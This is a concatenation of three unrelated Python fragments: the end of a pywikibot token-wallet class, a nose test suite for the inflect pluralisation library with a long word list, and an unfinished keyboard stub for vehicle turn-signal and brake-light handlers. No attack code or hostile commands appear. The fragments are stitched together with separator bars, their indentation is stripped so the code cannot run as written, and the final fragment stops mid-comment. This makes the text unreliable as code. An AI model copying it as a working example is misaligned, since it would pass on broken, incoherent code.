def __contains__(self, key) -> bool:
"""Return True if the given token name is cached."""
return key in self._tokens.setdefault(self.site.user(), {})
def __str__(self) -> str:
"""Return a str representation of the internal tokens dictionary."""
return self._tokens.__str__()
def __repr__(self) -> str:
"""Return a representation of the internal tokens dictionary."""
return self._tokens.__repr__()
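# Hedged usage sketch (assumes an already-configured pywikibot.site.APISite
# named `site`; in practice the site object creates its own TokenWallet):
#
#   wallet = TokenWallet(site)
#   token = wallet['edit']   # redirected to 'csrf' on MediaWiki >= 1.24wmf19
#   'csrf' in wallet         # True once the token has been cached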
|
from nose.tools import eq_, assert_not_equal
import inflect
def is_eq(p, a, b):
return (p.compare(a, b) or
p.plnounequal(a, b) or
p.plverbequal(a, b) or
p.pladjequal(a, b))
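# Hedged note: inflect's compare/plnounequal/plverbequal/pladjequal helpers
# return strings such as 'eq', 's:p' or 'p:s' (or False), so for example
# is_eq(p, 'cat', 'cats') is expected to yield 's:p'.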
def test_many():
p = inflect.engine()
data = get_data()
for line in data:
if 'TODO:' in line:
continue
try:
singular, rest = line.split('->', 1)
except ValueError:
continue
singular = singular.strip()
rest = rest.strip()
try:
plural, comment = rest.split('#', 1)
except ValueError:
plural = rest.strip()
comment = ''
try:
mod_plural, class_plural = plural.split("|", 1)
mod_plural = mod_plural.strip()
class_plural = class_plural.strip()
except ValueError:
mod_plural = class_plural = plural.strip()
if 'verb' in comment.lower():
is_nv = '_V'
elif 'noun' in comment.lower():
is_nv = '_N'
else:
is_nv = ''
p.classical(all=0, names=0)
mod_PL_V = p.plural_verb(singular)
mod_PL_N = p.plural_noun(singular)
mod_PL = p.plural(singular)
if is_nv == '_V':
mod_PL_val = mod_PL_V
elif is_nv == '_N':
mod_PL_val = mod_PL_N
else:
mod_PL_val = mod_PL
p.classical(all=1)
class_PL_V = p.plural_verb(singular)
class_PL_N = p.plural_noun(singular)
class_PL = p.plural(singular)
if is_nv == '_V':
class_PL_val = class_PL_V
elif is_nv == '_N':
class_PL_val = class_PL_N
else:
class_PL_val = class_PL
yield check_all, p, is_nv, singular, mod_PL_val, class_PL_val, mod_plural, class_plural
def check_all(p, is_nv, singular, mod_PL_val, class_PL_val, mod_plural, class_plural):
eq_(mod_plural, mod_PL_val)
eq_(class_plural, class_PL_val)
eq_(is_eq(p, singular, mod_plural) in ('s:p', 'p:s', 'eq'), True,
msg='is_eq(%s,%s) == %s != %s' % (singular, mod_plural, is_eq(p, singular, mod_plural), 's:p, p:s or eq'))
eq_(is_eq(p, mod_plural, singular) in ('p:s', 's:p', 'eq'), True,
msg='is_eq(%s,%s) == %s != %s' % (mod_plural, singular, is_eq(p, mod_plural, singular), 's:p, p:s or eq'))
eq_(is_eq(p, singular, class_plural) in ('s:p', 'p:s', 'eq'), True)
eq_(is_eq(p, class_plural, singular) in ('p:s', 's:p', 'eq'), True)
assert_not_equal(singular, '')
    eq_(mod_PL_val, mod_PL_val if class_PL_val else '%s|%s' % (mod_PL_val, class_PL_val))
if is_nv != '_V':
eq_(p.singular_noun(mod_plural, 1), singular,
msg="p.singular_noun(%s) == %s != %s" % (mod_plural, p.singular_noun(mod_plural, 1), singular))
eq_(p.singular_noun(class_plural, 1), singular,
msg="p.singular_noun(%s) == %s != %s" % (class_plural, p.singular_noun(class_plural, 1), singular))
'''
don't see any test data for this ???
elsif (/^\s+(an?)\s+(.*?)\s*$/)
{
$article = $1
$word = $2
$Aword = A($word)
ok ("$article $word" eq $Aword, "$article $word")
}
'''
def test_def():
p = inflect.engine()
p.defnoun("kin", "kine")
p.defnoun('(.*)x', '$1xen')
p.defverb('foobar', 'feebar',
'foobar', 'feebar',
'foobars', 'feebar')
p.defadj('red', 'red|gules')
eq_(p.no("kin", 0), "no kine", msg="kin -> kine (user defined)...")
eq_(p.no("kin", 1), "1 kin")
eq_(p.no("kin", 2), "2 kine")
eq_(p.no("regex", 0), "no regexen", msg="regex -> regexen (user defined)")
eq_(p.plural("foobar", 2), "feebar", msg="foobar -> feebar (user defined)...")
eq_(p.plural("foobars", 2), "feebar")
eq_(p.plural("red", 0), "red", msg="red -> red...")
eq_(p.plural("red", 1), "red")
eq_(p.plural("red", 2), "red")
p.classical(all=True)
eq_(p.plural("red", 0), "red", msg="red -> gules...")
eq_(p.plural("red", 1), "red")
eq_(p.plural("red", 2), "gules")
def test_ordinal():
p = inflect.engine()
eq_(p.ordinal(0), "0th", msg="0 -> 0th...")
eq_(p.ordinal(1), "1st")
eq_(p.ordinal(2), "2nd")
eq_(p.ordinal(3), "3rd")
eq_(p.ordinal(4), "4th")
eq_(p.ordinal(5), "5th")
eq_(p.ordinal(6), "6th")
eq_(p.ordinal(7), "7th")
eq_(p.ordinal(8), "8th")
eq_(p.ordinal(9), "9th")
eq_(p.ordinal(10), "10th")
eq_(p.ordinal(11), "11th")
eq_(p.ordinal(12), "12th")
eq_(p.ordinal(13), "13th")
eq_(p.ordinal(14), "14th")
eq_(p.ordinal(15), "15th")
eq_(p.ordinal(16), "16th")
eq_(p.ordinal(17), "17th")
eq_(p.ordinal(18), "18th")
eq_(p.ordinal(19), "19th")
eq_(p.ordinal(20), "20th")
eq_(p.ordinal(21), "21st")
eq_(p.ordinal(22), "22nd")
eq_(p.ordinal(23), "23rd")
eq_(p.ordinal(24), "24th")
eq_(p.ordinal(100), "100th")
eq_(p.ordinal(101), "101st")
eq_(p.ordinal(102), "102nd")
eq_(p.ordinal(103), "103rd")
eq_(p.ordinal(104), "104th")
eq_(p.ordinal('zero'), "zeroth", msg="zero -> zeroth...")
eq_(p.ordinal('one'), "first")
eq_(p.ordinal('two'), "second")
eq_(p.ordinal('three'), "third")
eq_(p.ordinal('four'), "fourth")
eq_(p.ordinal('five'), "fifth")
eq_(p.ordinal('six'), "sixth")
eq_(p.ordinal('seven'), "seventh")
eq_(p.ordinal('eight'), "eighth")
eq_(p.ordinal('nine'), "ninth")
eq_(p.ordinal('ten'), "tenth")
eq_(p.ordinal('eleven'), "eleventh")
eq_(p.ordinal('twelve'), "twelfth")
eq_(p.ordinal('thirteen'), "thirteenth")
eq_(p.ordinal('fourteen'), "fourteenth")
eq_(p.ordinal('fifteen'), "fifteenth")
eq_(p.ordinal('sixteen'), "sixteenth")
eq_(p.ordinal('seventeen'), "seventeenth")
eq_(p.ordinal('eighteen'), "eighteenth")
eq_(p.ordinal('nineteen'), "nineteenth")
eq_(p.ordinal('twenty'), "twentieth")
eq_(p.ordinal('twenty-one'), "twenty-first")
eq_(p.ordinal('twenty-two'), "twenty-second")
eq_(p.ordinal('twenty-three'), "twenty-third")
eq_(p.ordinal('twenty-four'), "twenty-fourth")
eq_(p.ordinal('one hundred'), "one hundredth")
eq_(p.ordinal('one hundred and one'), "one hundred and first")
eq_(p.ordinal('one hundred and two'), "one hundred and second")
eq_(p.ordinal('one hundred and three'), "one hundred and third")
eq_(p.ordinal('one hundred and four'), "one hundred and fourth")
def test_prespart():
p = inflect.engine()
eq_(p.present_participle("sees"), "seeing", msg="sees -> seeing...")
eq_(p.present_participle("eats"), "eating")
eq_(p.present_participle("bats"), "batting")
eq_(p.present_participle("hates"), "hating")
eq_(p.present_participle("spies"), "spying")
eq_(p.present_participle("skis"), "skiing")
def get_data():
return '''
a -> as # NOUN FORM
TODO:sing a -> some # INDEFINITE ARTICLE
TODO: A.C.R.O.N.Y.M. -> A.C.R.O.N.Y.M.s
abscissa -> abscissas|abscissae
Achinese -> Achinese
acropolis -> acropolises
adieu -> adieus|adieux
adjutant general -> adjutant generals
aegis -> aegises
afflatus -> afflatuses
afreet -> afreets|afreeti
afrit -> afrits|afriti
agendum -> agenda
aide-de-camp -> aides-de-camp
Alabaman -> Alabamans
albino -> albinos
album -> albums
Alfurese -> Alfurese
alga -> algae
alias -> aliases
alto -> altos|alti
alumna -> alumnae
alumnus -> alumni
alveolus -> alveoli
TODO:siverb am -> are
TODO:siverb am going -> are going
ambassador-at-large -> ambassadors-at-large
Amboinese -> Amboinese
Americanese -> Americanese
amoeba -> amoebas|amoebae
Amoyese -> Amoyese
TODO:siadj an -> some # INDEFINITE ARTICLE
analysis -> analyses
anathema -> anathemas|anathemata
Andamanese -> Andamanese
Angolese -> Angolese
Annamese -> Annamese
antenna -> antennas|antennae
anus -> anuses
apex -> apexes|apices
TODO:siadj apex's -> apexes'|apices' # POSSESSIVE FORM
aphelion -> aphelia
apparatus -> apparatuses|apparatus
appendix -> appendixes|appendices
apple -> apples
aquarium -> aquariums|aquaria
Aragonese -> Aragonese
Arakanese -> Arakanese
archipelago -> archipelagos
TODO:siverb are -> are
TODO:siverb are made -> are made
armadillo -> armadillos
arpeggio -> arpeggios
arthritis -> arthritises|arthritides
asbestos -> asbestoses
asparagus -> asparaguses
ass -> asses
Assamese -> Assamese
asylum -> asylums
asyndeton -> asyndeta
at it -> at them # ACCUSATIVE
ataman -> atamans
TODO:siverb ate -> ate
atlas -> atlases|atlantes
atman -> atmas
TODO:singular_noun attorney general -> attorneys general
attorney of record -> attorneys of record
aurora -> auroras|aurorae
auto -> autos
auto-da-fe -> autos-da-fe
aviatrix -> aviatrixes|aviatrices
TODO:siadj aviatrix's -> aviatrixes'|aviatrices'
Avignonese -> Avignonese
axe -> axes
    TODO:singular_noun 2 answers! axis -> axes
axman -> axmen
Azerbaijanese -> Azerbaijanese
bacillus -> bacilli
bacterium -> bacteria
Bahaman -> Bahamans
Balinese -> Balinese
bamboo -> bamboos
banjo -> banjoes
bass -> basses # INSTRUMENT, NOT FISH
basso -> bassos|bassi
bathos -> bathoses
beau -> beaus|beaux
beef -> beefs|beeves
beneath it -> beneath them # ACCUSATIVE
Bengalese -> Bengalese
bent -> bent # VERB FORM
bent -> bents # NOUN FORM
Bernese -> Bernese
Bhutanese -> Bhutanese
bias -> biases
biceps -> biceps
bison -> bisons|bison
blouse -> blouses
Bolognese -> Bolognese
bonus -> bonuses
Borghese -> Borghese
boss -> bosses
Bostonese -> Bostonese
box -> boxes
boy -> boys
bravo -> bravoes
bream -> bream
breeches -> breeches
bride-to-be -> brides-to-be
Brigadier General -> Brigadier Generals
britches -> britches
bronchitis -> bronchitises|bronchitides
bronchus -> bronchi
brother -> brothers|brethren
TODO: brother's -> brothers'|brethren's
buffalo -> buffaloes|buffalo
Buginese -> Buginese
buoy -> buoys
bureau -> bureaus|bureaux
Burman -> Burmans
Burmese -> Burmese
bursitis -> bursitises|bursitides
bus -> buses
buzz -> buzzes
buzzes -> buzz # VERB FORM
by it -> by them # ACCUSATIVE
caddis -> caddises
caiman -> caimans
cake -> cakes
Calabrese -> Calabrese
calf -> calves
callus -> calluses
Camaldolese -> Camaldolese
cameo -> cameos
campus -> campuses
can -> cans # NOUN FORM
can -> can # VERB FORM (all pers.)
can't -> can't # VERB FORM
candelabrum -> candelabra
cannabis -> cannabises
TODO:siverb canoes -> canoe
canto -> cantos
Cantonese -> Cantonese
cantus -> cantus
canvas -> canvases
CAPITAL -> CAPITALS
carcinoma -> carcinomas|carcinomata
care -> cares
cargo -> cargoes
caribou -> caribous|caribou
Carlylese -> Carlylese
carmen -> carmina
carp -> carp
Cassinese -> Cassinese
cat -> cats
catfish -> catfish
cayman -> caymans
Celanese -> Celanese
ceriman -> cerimans
cervid -> cervids
Ceylonese -> Ceylonese
chairman -> chairmen
chamois -> chamois
chaos -> chaoses
chapeau -> chapeaus|chapeaux
charisma -> charismas|charismata
TODO:siverb chases -> chase
chassis -> chassis
chateau -> chateaus|chateaux
cherub -> cherubs|cherubim
chickenpox -> chickenpox
chief -> chiefs
child -> children
Chinese -> Chinese
chorus -> choruses
chrysalis -> chrysalises|chrysalides
church -> churches
cicatrix -> cicatrixes|cicatrices
circus -> circuses
class -> classes
classes -> class # VERB FORM
clippers -> clippers
clitoris -> clitorises|clitorides
cod -> cod
codex -> codices
coitus -> coitus
commando -> commandos
compendium -> compendiums|compendia
coney -> coneys
Congoese -> Congoese
Congolese -> Congolese
conspectus -> conspectuses
contralto -> contraltos|contralti
contretemps -> contretemps
conundrum -> conundrums
corps -> corps
corpus -> corpuses|corpora
cortex -> cortexes|cortices
cosmos -> cosmoses
TODO:singular_noun court martial -> courts martial
cow -> cows|kine
cranium -> craniums|crania
crescendo -> crescendos
criterion -> criteria
curriculum -> curriculums|curricula
czech -> czechs
dais -> daises
data point -> data points
datum -> data
debris -> debris
decorum -> decorums
deer -> deer
delphinium -> delphiniums
desideratum -> desiderata
desman -> desmans
diabetes -> diabetes
dictum -> dictums|dicta
TODO:siverb did -> did
TODO:siverb did need -> did need
digitalis -> digitalises
dingo -> dingoes
diploma -> diplomas|diplomata
discus -> discuses
dish -> dishes
ditto -> dittos
djinn -> djinn
TODO:siverb does -> do
TODO:siverb doesn't -> don't # VERB FORM
dog -> dogs
dogma -> dogmas|dogmata
dolman -> dolmans
dominatrix -> dominatrixes|dominatrices
domino -> dominoes
Dongolese -> Dongolese
dormouse -> dormice
drama -> dramas|dramata
drum -> drums
dwarf -> dwarves
dynamo -> dynamos
edema -> edemas|edemata
eland -> elands|eland
elf -> elves
elk -> elks|elk
embryo -> embryos
emporium -> emporiums|emporia
encephalitis -> encephalitises|encephalitides
enconium -> enconiums|enconia
enema -> enemas|enemata
enigma -> enigmas|enigmata
epidermis -> epidermises
epididymis -> epididymises|epididymides
erratum -> errata
ethos -> ethoses
eucalyptus -> eucalyptuses
eunuch -> eunuchs
extremum -> extrema
eyas -> eyases
factotum -> factotums
farman -> farmans
Faroese -> Faroese
fauna -> faunas|faunae
fax -> faxes
Ferrarese -> Ferrarese
ferry -> ferries
fetus -> fetuses
fiance -> fiances
fiancee -> fiancees
fiasco -> fiascos
fish -> fish
fizz -> fizzes
flamingo -> flamingoes
flittermouse -> flittermice
TODO:siverb floes -> floe
flora -> floras|florae
flounder -> flounder
focus -> focuses|foci
foetus -> foetuses
folio -> folios
Foochowese -> Foochowese
foot -> feet
TODO:siadj foot's -> feet's # POSSESSIVE FORM
foramen -> foramens|foramina
TODO:siverb foreshoes -> foreshoe
formula -> formulas|formulae
forum -> forums
TODO:siverb fought -> fought
fox -> foxes
TODO:singular_noun 2 different returns from him -> from them
from it -> from them # ACCUSATIVE
fungus -> funguses|fungi
Gabunese -> Gabunese
gallows -> gallows
ganglion -> ganglions|ganglia
gas -> gases
gateau -> gateaus|gateaux
TODO:siverb gave -> gave
general -> generals
generalissimo -> generalissimos
Genevese -> Genevese
genie -> genies|genii
TODO:singular_noun 2 diff return values! genius -> geniuses|genii
Genoese -> Genoese
genus -> genera
German -> Germans
ghetto -> ghettos
Gilbertese -> Gilbertese
glottis -> glottises
Goanese -> Goanese
goat -> goats
goose -> geese
TODO:singular_noun Governor General -> Governors General
goy -> goys|goyim
graffiti -> graffiti
TODO:singular_noun 2 diff ret values graffito -> graffiti
grizzly -> grizzlies
guano -> guanos
guardsman -> guardsmen
Guianese -> Guianese
gumma -> gummas|gummata
TODO:siverb gumshoes -> gumshoe
gunman -> gunmen
gymnasium -> gymnasiums|gymnasia
TODO:siverb had -> had
TODO:siverb had thought -> had thought
Hainanese -> Hainanese
TODO:siverb hammertoes -> hammertoe
handkerchief -> handkerchiefs
Hararese -> Hararese
Harlemese -> Harlemese
harman -> harmans
harmonium -> harmoniums
TODO:siverb has -> have
TODO:siverb has become -> have become
TODO:siverb has been -> have been
TODO:siverb has-been -> has-beens
hasn't -> haven't # VERB FORM
Havanese -> Havanese
TODO:siverb have -> have
TODO:siverb have conceded -> have conceded
TODO:singular_noun 2 values he -> they
headquarters -> headquarters
Heavenese -> Heavenese
helix -> helices
hepatitis -> hepatitises|hepatitides
TODO:singular_noun 2 values her -> them # PRONOUN
TODO:singular_noun 2 values her -> their # POSSESSIVE ADJ
hero -> heroes
herpes -> herpes
TODO:singular_noun 2 values hers -> theirs # POSSESSIVE NOUN
TODO:singular_noun 2 values herself -> themselves
hetman -> hetmans
hiatus -> hiatuses|hiatus
highlight -> highlights
hijinks -> hijinks
TODO:singular_noun 2 values him -> them
TODO:singular_noun 2 values himself -> themselves
hippopotamus -> hippopotamuses|hippopotami
Hiroshiman -> Hiroshimans
TODO:singular_noun 2 values his -> their # POSSESSIVE ADJ
TODO:singular_noun 2 values his -> theirs # POSSESSIVE NOUN
TODO:siverb hoes -> hoe
honorarium -> honorariums|honoraria
hoof -> hoofs|hooves
Hoosierese -> Hoosierese
TODO:siverb horseshoes -> horseshoe
Hottentotese -> Hottentotese
house -> houses
housewife -> housewives
hubris -> hubrises
human -> humans
Hunanese -> Hunanese
hydra -> hydras|hydrae
hyperbaton -> hyperbata
hyperbola -> hyperbolas|hyperbolae
I -> we
ibis -> ibises
ignoramus -> ignoramuses
impetus -> impetuses|impetus
incubus -> incubuses|incubi
index -> indexes|indices
Indochinese -> Indochinese
inferno -> infernos
innings -> innings
TODO:singular_noun Inspector General -> Inspectors General
interregnum -> interregnums|interregna
iris -> irises|irides
TODO:siverb is -> are
TODO:siverb is eaten -> are eaten
isn't -> aren't # VERB FORM
it -> they # NOMINATIVE
TODO:siadj its -> their # POSSESSIVE FORM
itself -> themselves
jackanapes -> jackanapes
Japanese -> Japanese
Javanese -> Javanese
Jerry -> Jerrys
jerry -> jerries
jinx -> jinxes
jinxes -> jinx # VERB FORM
Johnsonese -> Johnsonese
Jones -> Joneses
jumbo -> jumbos
Kanarese -> Kanarese
Kiplingese -> Kiplingese
knife -> knives # NOUN FORM
knife -> knife # VERB FORM (1st/2nd pers.)
knifes -> knife # VERB FORM (3rd pers.)
Kongoese -> Kongoese
Kongolese -> Kongolese
lacuna -> lacunas|lacunae
lady in waiting -> ladies in waiting
Lapponese -> Lapponese
larynx -> larynxes|larynges
latex -> latexes|latices
lawman -> lawmen
layman -> laymen
leaf -> leaves # NOUN FORM
leaf -> leaf # VERB FORM (1st/2nd pers.)
leafs -> leaf # VERB FORM (3rd pers.)
Lebanese -> Lebanese
leman -> lemans
lemma -> lemmas|lemmata
lens -> lenses
Leonese -> Leonese
lick of the cat -> licks of the cat
Lieutenant General -> Lieutenant Generals
life -> lives
Liman -> Limans
lingo -> lingos
loaf -> loaves
locus -> loci
Londonese -> Londonese
Lorrainese -> Lorrainese
lothario -> lotharios
louse -> lice
Lucchese -> Lucchese
lumbago -> lumbagos
lumen -> lumens|lumina
lummox -> lummoxes
lustrum -> lustrums|lustra
lyceum -> lyceums
lymphoma -> lymphomas|lymphomata
lynx -> lynxes
Lyonese -> Lyonese
TODO: M.I.A. -> M.I.A.s
Macanese -> Macanese
Macassarese -> Macassarese
mackerel -> mackerel
macro -> macros
TODO:siverb made -> made
madman -> madmen
Madurese -> Madurese
magma -> magmas|magmata
magneto -> magnetos
Major General -> Major Generals
Malabarese -> Malabarese
Maltese -> Maltese
man -> men
mandamus -> mandamuses
manifesto -> manifestos
mantis -> mantises
marquis -> marquises
Mary -> Marys
maximum -> maximums|maxima
measles -> measles
medico -> medicos
medium -> mediums|media
TODO:siadj medium's -> mediums'|media's
medusa -> medusas|medusae
memorandum -> memorandums|memoranda
meniscus -> menisci
merman -> mermen
Messinese -> Messinese
metamorphosis -> metamorphoses
metropolis -> metropolises
mews -> mews
miasma -> miasmas|miasmata
Milanese -> Milanese
milieu -> milieus|milieux
millennium -> millenniums|millennia
minimum -> minimums|minima
minx -> minxes
miss -> miss # VERB FORM (1st/2nd pers.)
miss -> misses # NOUN FORM
misses -> miss # VERB FORM (3rd pers.)
TODO:siverb mistletoes -> mistletoe
mittamus -> mittamuses
Modenese -> Modenese
momentum -> momentums|momenta
money -> monies
mongoose -> mongooses
moose -> moose
mother-in-law -> mothers-in-law
mouse -> mice
mumps -> mumps
Muranese -> Muranese
murex -> murices
museum -> museums
mustachio -> mustachios
TODO:siadj my -> our # POSSESSIVE FORM
myself -> ourselves
mythos -> mythoi
Nakayaman -> Nakayamans
Nankingese -> Nankingese
nasturtium -> nasturtiums
Navarrese -> Navarrese
nebula -> nebulas|nebulae
Nepalese -> Nepalese
neuritis -> neuritises|neuritides
neurosis -> neuroses
news -> news
nexus -> nexus
Niasese -> Niasese
Nicobarese -> Nicobarese
nimbus -> nimbuses|nimbi
Nipponese -> Nipponese
no -> noes
Norman -> Normans
nostrum -> nostrums
noumenon -> noumena
nova -> novas|novae
nucleolus -> nucleoluses|nucleoli
nucleus -> nuclei
numen -> numina
oaf -> oafs
TODO:siverb oboes -> oboe
occiput -> occiputs|occipita
octavo -> octavos
octopus -> octopuses|octopodes
oedema -> oedemas|oedemata
Oklahoman -> Oklahomans
omnibus -> omnibuses
on it -> on them # ACCUSATIVE
onus -> onuses
opera -> operas
optimum -> optimums|optima
opus -> opuses|opera
organon -> organa
ottoman -> ottomans
ought to be -> ought to be # VERB (UNLIKE bride to be)
TODO:siverb overshoes -> overshoe
TODO:siverb overtoes -> overtoe
ovum -> ova
ox -> oxen
TODO:siadj ox's -> oxen's # POSSESSIVE FORM
oxman -> oxmen
oxymoron -> oxymorons|oxymora
Panaman -> Panamans
parabola -> parabolas|parabolae
Parmese -> Parmese
pathos -> pathoses
pegasus -> pegasuses
Pekingese -> Pekingese
pelvis -> pelvises
pendulum -> pendulums
penis -> penises|penes
penumbra -> penumbras|penumbrae
perihelion -> perihelia
person -> people|persons
persona -> personae
petroleum -> petroleums
phalanx -> phalanxes|phalanges
PhD -> PhDs
phenomenon -> phenomena
philtrum -> philtrums
photo -> photos
phylum -> phylums|phyla
piano -> pianos|piani
Piedmontese -> Piedmontese
pika -> pikas
TODO:singular_noun ret mul value pincer -> pincers
pincers -> pincers
Pistoiese -> Pistoiese
plateau -> plateaus|plateaux
play -> plays
plexus -> plexuses|plexus
pliers -> pliers
plies -> ply # VERB FORM
polis -> polises
Polonese -> Polonese
pontifex -> pontifexes|pontifices
portmanteau -> portmanteaus|portmanteaux
Portuguese -> Portuguese
possum -> possums
potato -> potatoes
pox -> pox
pragma -> pragmas|pragmata
premium -> premiums
prima donna -> prima donnas|prime donne
pro -> pros
proceedings -> proceedings
prolegomenon -> prolegomena
proof -> proofs
proof of concept -> proofs of concept
prosecutrix -> prosecutrixes|prosecutrices
prospectus -> prospectuses|prospectus
protozoan -> protozoans
protozoon -> protozoa
puma -> pumas
TODO:siverb put -> put
quantum -> quantums|quanta
TODO:singular_noun quartermaster general -> quartermasters general
quarto -> quartos
quiz -> quizzes
quizzes -> quiz # VERB FORM
quorum -> quorums
rabies -> rabies
radius -> radiuses|radii
radix -> radices
ragman -> ragmen
rebus -> rebuses
TODO:siverb rehoes -> rehoe
reindeer -> reindeer
TODO:siverb reshoes -> reshoe
rhino -> rhinos
rhinoceros -> rhinoceroses|rhinoceros
TODO:siverb roes -> roe
Rom -> Roma
Romagnese -> Romagnese
Roman -> Romans
Romanese -> Romanese
Romany -> Romanies
romeo -> romeos
roof -> roofs
rostrum -> rostrums|rostra
ruckus -> ruckuses
salmon -> salmon
Sangirese -> Sangirese
TODO: siverb sank -> sank
Sarawakese -> Sarawakese
sarcoma -> sarcomas|sarcomata
sassafras -> sassafrases
saw -> saw # VERB FORM (1st/2nd pers.)
saw -> saws # NOUN FORM
saws -> saw # VERB FORM (3rd pers.)
scarf -> scarves
schema -> schemas|schemata
scissors -> scissors
Scotsman -> Scotsmen
sea-bass -> sea-bass
seaman -> seamen
self -> selves
Selman -> Selmans
Senegalese -> Senegalese
seraph -> seraphs|seraphim
series -> series
TODO:siverb shall eat -> shall eat
shaman -> shamans
Shavese -> Shavese
Shawanese -> Shawanese
TODO:singular_noun multivalue she -> they
sheaf -> sheaves
shears -> shears
sheep -> sheep
shelf -> shelves
TODO:siverb shoes -> shoe
TODO:siverb should have -> should have
Siamese -> Siamese
siemens -> siemens
Sienese -> Sienese
Sikkimese -> Sikkimese
silex -> silices
simplex -> simplexes|simplices
Singhalese -> Singhalese
Sinhalese -> Sinhalese
sinus -> sinuses|sinus
size -> sizes
sizes -> size #VERB FORM
smallpox -> smallpox
Smith -> Smiths
TODO:siverb snowshoes -> snowshoe
Sogdianese -> Sogdianese
soliloquy -> soliloquies
solo -> solos|soli
soma -> somas|somata
TODO:singular_noun tough son of a bitch -> sons of bitches
Sonaman -> Sonamans
soprano -> sopranos|soprani
TODO:siverb sought -> sought
TODO:siverb spattlehoes -> spattlehoe
species -> species
spectrum -> spectrums|spectra
speculum -> speculums|specula
TODO:siverb spent -> spent
spermatozoon -> spermatozoa
sphinx -> sphinxes|sphinges
spokesperson -> spokespeople|spokespersons
stadium -> stadiums|stadia
stamen -> stamens|stamina
status -> statuses|status
stereo -> stereos
stigma -> stigmas|stigmata
stimulus -> stimuli
stoma -> stomas|stomata
stomach -> stomachs
storey -> storeys
story -> stories
stratum -> strata
strife -> strifes
stylo -> stylos
stylus -> styluses|styli
succubus -> succubuses|succubi
Sudanese -> Sudanese
suffix -> suffixes
Sundanese -> Sundanese
superior -> superiors
TODO:singular_noun Surgeon-General -> Surgeons-General
surplus -> surpluses
Swahilese -> Swahilese
swine -> swines|swine
TODO:singular_noun multiple return syringe -> syringes
syrinx -> syrinxes|syringes
tableau -> tableaus|tableaux
Tacoman -> Tacomans
talouse -> talouses
tattoo -> tattoos
taxman -> taxmen
tempo -> tempos|tempi
Tenggerese -> Tenggerese
testatrix -> testatrixes|testatrices
testes -> testes
TODO:singular_noun multiple return testis -> testes
TODO:siadj that -> those
TODO:siadj their -> their # POSSESSIVE FORM (GENDER-INCLUSIVE)
TODO:singular_noun multiple return themself -> themselves # ugly but gaining currency
TODO:singular_noun multiple return they -> they # for indeterminate gender
thief -> thiefs|thieves
TODO:siadj this -> these
thought -> thoughts # NOUN FORM
thought -> thought # VERB FORM
TODO:siverb throes -> throe
TODO:siverb ticktacktoes -> ticktacktoe
Times -> Timeses
Timorese -> Timorese
TODO:siverb tiptoes -> tiptoe
Tirolese -> Tirolese
titmouse -> titmice
TODO:singular_noun multivalue to her -> to them
TODO:singular_noun multivalue to herself -> to themselves
TODO:singular_noun multivalue to him -> to them
TODO:singular_noun multivalue to himself -> to themselves
to it -> to them
to it -> to them # ACCUSATIVE
to itself -> to themselves
to me -> to us
to myself -> to ourselves
TODO:singular_noun multivalue to them -> to them # for indeterminate gender
TODO:singular_noun multivalue to themself -> to themselves # ugly but gaining currency
to you -> to you
to yourself -> to yourselves
Tocharese -> Tocharese
TODO:siverb toes -> toe
tomato -> tomatoes
Tonkinese -> Tonkinese
tonsillitis -> tonsillitises|tonsillitides
tooth -> teeth
Torinese -> Torinese
torus -> toruses|tori
trapezium -> trapeziums|trapezia
trauma -> traumas|traumata
travois -> travois
trellis -> trellises
TODO:siverb tries -> try
trilby -> trilbys
trousers -> trousers
trousseau -> trousseaus|trousseaux
trout -> trout
TODO:siverb try -> tries
tuna -> tuna
turf -> turfs|turves
Tyrolese -> Tyrolese
ultimatum -> ultimatums|ultimata
umbilicus -> umbilicuses|umbilici
umbra -> umbras|umbrae
TODO:siverb undershoes -> undershoe
TODO:siverb unshoes -> unshoe
uterus -> uteruses|uteri
vacuum -> vacuums|vacua
vellum -> vellums
velum -> velums|vela
Vermontese -> Vermontese
Veronese -> Veronese
vertebra -> vertebrae
vertex -> vertexes|vertices
Viennese -> Viennese
Vietnamese -> Vietnamese
virtuoso -> virtuosos|virtuosi
virus -> viruses
vixen -> vixens
vortex -> vortexes|vortices
walrus -> walruses
TODO:siverb was -> were
TODO:siverb was faced with -> were faced with
TODO:siverb was hoping -> were hoping
Wenchowese -> Wenchowese
TODO:siverb were -> were
TODO:siverb were found -> were found
wharf -> wharves
whiting -> whiting
Whitmanese -> Whitmanese
whiz -> whizzes
TODO:singular_noun multivalue whizz -> whizzes
widget -> widgets
wife -> wives
wildebeest -> wildebeests|wildebeest
will -> will # VERB FORM
will -> wills # NOUN FORM
will eat -> will eat # VERB FORM
wills -> will # VERB FORM
wish -> wishes
TODO:singular_noun multivalue with him -> with them
with it -> with them # ACCUSATIVE
TODO:siverb woes -> woe
wolf -> wolves
woman -> women
woman of substance -> women of substance
TODO:siadj woman's -> women's # POSSESSIVE FORM
won't -> won't # VERB FORM
woodlouse -> woodlice
Yakiman -> Yakimans
Yengeese -> Yengeese
yeoman -> yeomen
yeowoman -> yeowomen
yes -> yeses
Yokohaman -> Yokohamans
you -> you
TODO:siadj your -> your # POSSESSIVE FORM
yourself -> yourselves
Yuman -> Yumans
Yunnanese -> Yunnanese
zero -> zeros
zoon -> zoa
'''.split('\n')
|
turnsignal_min = 0
turnsignal_max = 255
turnsignal_step = 15
turnsignal_delay = 0.1
brakelight_min = 75
brakelight_max = 255
brakelight_step = 100
brakelight_delay = 0.1
def input_turnr(key): # returns the state of the right turn input
if key == 77: # (right arrow)
return 1
else:
return 0
def input_start(key): # returns the state of the start input
if key == 115: # (s)
return 1
else:
return 0
def input_horn(key): # returns the state of the horn input
if key == 104: # (h)
return 1
else:
return 0
def input_turnl(key): # returns the state of the left turn input
if key == 75: # (left arrow)
return 1
else:
return 0
def input_config(key): # returns the state of the config input
return 0
def input_light(key): # returns the state of the light input
if key == 108: # (l)
return 1
else:
return 0
def input_brake(key): # returns the state of the brake input
if key == 80: # (down arrow)
return 1
else:
return 0
def input_lock(key): # returns the state of the lock input
return 0
def output_turnr(o): # sets right turn output to given value
print "Right Turn: " + str(o) + '\n'
return 0
def output_start(o): # sets start output to given value
return 0
def output_horn(o): # sets horn output to given value
return 0
def output_turnl(o): # sets left turn output to given value
print "Left Turn: " + str(o) + '\n'
return 0
def output_lightlo(o): # sets light lo output to given value
return 0
def output_lighthi(o): # sets light hi output to given value
return 0
def output_brake(o): # sets brake output to given value
print "Brake: " + str(o) + '\n'
return 0
def output_aux(o): # sets aux output to given value
return 0
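# Hedged sketch of a polling loop wiring these handlers together. The key
# codes above (75/77/80 plus ASCII letters) suggest msvcrt.getch() on Windows;
# that module choice is an assumption, not part of this file.
#
#   import msvcrt, time
#   while True:
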